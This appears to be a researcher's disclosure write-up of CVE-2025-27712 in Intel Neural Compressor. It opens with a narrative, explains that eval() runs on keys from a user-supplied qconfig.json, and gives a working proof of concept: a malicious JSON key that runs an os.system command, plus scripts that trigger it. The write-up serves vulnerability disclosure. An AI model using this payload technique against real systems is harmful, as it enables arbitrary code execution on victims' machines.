Privilege Escalation in Intel Neural Compressor via eval() CVE-2025-27712
Story
It was past midnight when I found myself drifting through the internals of Intel’s Neural Compressor. The room was quiet, the only sound the soft hum of my laptop’s fan struggling against the weight of countless repositories I had open. I wasn’t searching for trouble. All I wanted was to understand how this framework handled model configuration. Something simple. Something harmless.
But the universe has a habit of placing small anomalies in your path when you least expect them. A function name caught my eye inside the load_config_mapping implementation. It felt ordinary at first glance. A utility function meant to map configuration keys. Straightforward. Routine.
Then I saw it. eval().
In that quiet moment, everything around me froze. My fingers hovered above the keyboard. The presence of eval in a function that processed user-supplied configuration data wasn’t just a misstep. It was an invitation. A silent door left ajar. A place where anything crafted carefully enough could slip through and execute in the heart of the system.
I read the line again. And again. And every time, the weight of it became clearer. If someone slipped malicious code inside qconfig.json, the framework would execute it without hesitation. No warnings. No barriers. Just blind trust.
That was all it took for the story to change. What began as a casual evening code read turned into a path that revealed a full Privilege Escalation vulnerability. A weakness hidden not in some obscure binary, but right in a JSON configuration parser trusted by countless developers.
Root Cause
At the heart of the issue lies the use of eval on keys loaded directly from user-supplied JSON files. It means that any string placed as a key will be interpreted and executed as Python code.
Direct reference to vulnerable code:
Proof of Concept (PoC)
1. Install Intel Neural Compressor:
pip install neural-compressor
2. Run configuration script (config.py):
import torch
from torchvision.models import resnet18
from neural_compressor.torch.quantization import prepare, convert, RTNConfig
model = resnet18(pretrained=True)
quant_config = RTNConfig()
model = prepare(model, quant_config)
model = convert(model)
model.save("saved_results")
3. Replace saved_results/qconfig.json with payload:
{
"('dummy_op', import('os').system('touch /tmp/soloplayer'))": {
"default": {
"some_key": "some_value"
}
}
}
4. Run exploit script (exploit.py):
import os
from torchvision.models import resnet18
from neural_compressor.torch.quantization import load
orig_model = resnet18(pretrained=True)
print("[*] Loading model with malicious qconfig.json...")
_ = load("saved_results", original_model=orig_model)
5. Verify created file:
ls -l /tmp/soloplayer
Impact
This vulnerability enables full arbitrary command execution, allowing attackers to run system-level commands simply by tricking the framework into loading a malicious qconfig.json file.